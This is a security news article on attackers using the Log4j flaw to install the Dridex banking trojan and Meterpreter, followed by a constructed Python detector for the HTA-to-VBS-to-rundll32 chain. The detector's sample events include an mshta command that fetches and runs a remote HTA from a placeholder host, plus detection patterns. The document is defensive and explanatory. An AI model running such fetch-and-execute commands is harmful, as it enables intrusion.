The Dridex malware is a banking trojan that was originally designed to steal victims’ online banking credentials but has since evolved into a loader that downloads modules used for a range of malicious actions, such as installing additional payloads, spreading to other devices, taking screenshots, and more.

Dridex infections have been connected to ransomware attacks carried out by actors linked to the Evil Corp hacker gang.

What Happened?

Cryptolaemus, a cybersecurity research firm, has warned that the Log4j vulnerability is currently being used to infect Windows devices with the Dridex Trojan and Linux devices with Meterpreter.

According to Joseph Roosen, threat actors harness the Log4j RMI (Remote Method Invocation) exploit variant to force susceptible devices to load and execute a Java class from an attacker-controlled remote server.

As explained by BleepingComputer, when the Java class is launched, it will first try to download and launch an HTA file from multiple URLs, which will install the Dridex trojan. If the Windows instructions cannot be executed, it will assume the device is running Linux/Unix and will download and run a Python script to install Meterpreter.

On Windows, the Java class downloads and opens an HTA file, which drops a VBS file in the C:\ProgramData folder. This VBS script serves as Dridex’s principal downloader and has previously been seen in Dridex email campaigns.

When run, the VBS code will check several environment variables to see if the user is a member of a Windows domain. If the user is a domain member, the VBS code will download the Dridex DLL and run it with Rundll32.exe.
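As an added example (not code from the article or from Heimdal), the following Python detector runs over constructed process-creation events and flags the Windows stage described above: rundll32.exe launched by a script host that is running a .vbs file out of C:\ProgramData, with an mshta.exe ancestor strengthening the match. The key=value event format, the file names and the placeholder host are assumptions, not indicators from any real campaign.

```python
import re

# Constructed process-creation events in a simplified key=value form (not real telemetry).
# The host, file names and DLL export are placeholders, not campaign indicators.
SAMPLE_EVENTS = [
    r"pid=4012 ppid=3300 image=C:\Windows\System32\mshta.exe cmd=mshta.exe http://example.invalid/x.hta",
    r"pid=4100 ppid=4012 image=C:\Windows\System32\wscript.exe cmd=wscript.exe C:\ProgramData\update.vbs",
    r"pid=4188 ppid=4100 image=C:\Windows\System32\rundll32.exe cmd=rundll32.exe C:\Users\Public\a.dll,Start",
    # Benign-looking pair: a logon script outside ProgramData that also spawns rundll32.
    r"pid=5000 ppid=600 image=C:\Windows\System32\wscript.exe cmd=wscript.exe C:\Scripts\logon.vbs",
    r"pid=5012 ppid=5000 image=C:\Windows\System32\rundll32.exe cmd=rundll32.exe shell32.dll,Control_RunDLL",
]

EVENT_RE = re.compile(r"pid=(\d+) ppid=(\d+) image=(\S+) cmd=(.*)")
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
# Matches a .vbs path under C:\ProgramData anywhere in the command line.
VBS_IN_PROGRAMDATA = re.compile(r"c:\\programdata\\[^ ]*\.vbs", re.IGNORECASE)


def parse_events(lines):
    """Return {pid: (ppid, image basename in lower case, command line)}."""
    procs = {}
    for line in lines:
        m = EVENT_RE.match(line)
        if not m:
            continue  # skip lines that are not process-creation events
        pid, ppid, image, cmd = m.groups()
        procs[int(pid)] = (int(ppid), image.rsplit("\\", 1)[-1].lower(), cmd)
    return procs


def find_dridex_like_chains(lines):
    """Return [(rundll32 pid, ancestor chain)] for every rundll32.exe whose parent is a
    script host executing a .vbs from ProgramData; an mshta.exe grandparent is appended
    to the chain when present, mirroring the HTA -> VBS -> DLL sequence."""
    procs = parse_events(lines)
    hits = []
    for pid, (ppid, image, _cmd) in procs.items():
        if image != "rundll32.exe":
            continue
        parent = procs.get(ppid)
        if not parent or parent[1] not in SCRIPT_HOSTS or not VBS_IN_PROGRAMDATA.search(parent[2]):
            continue
        chain = [parent[1], image]
        grandparent = procs.get(parent[0])
        if grandparent and grandparent[1] == "mshta.exe":
            chain.insert(0, "mshta.exe")
        hits.append((pid, chain))
    return hits
```

The second wscript/rundll32 pair is deliberately left unflagged: the rule keys on the script's location, not on rundll32 alone.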

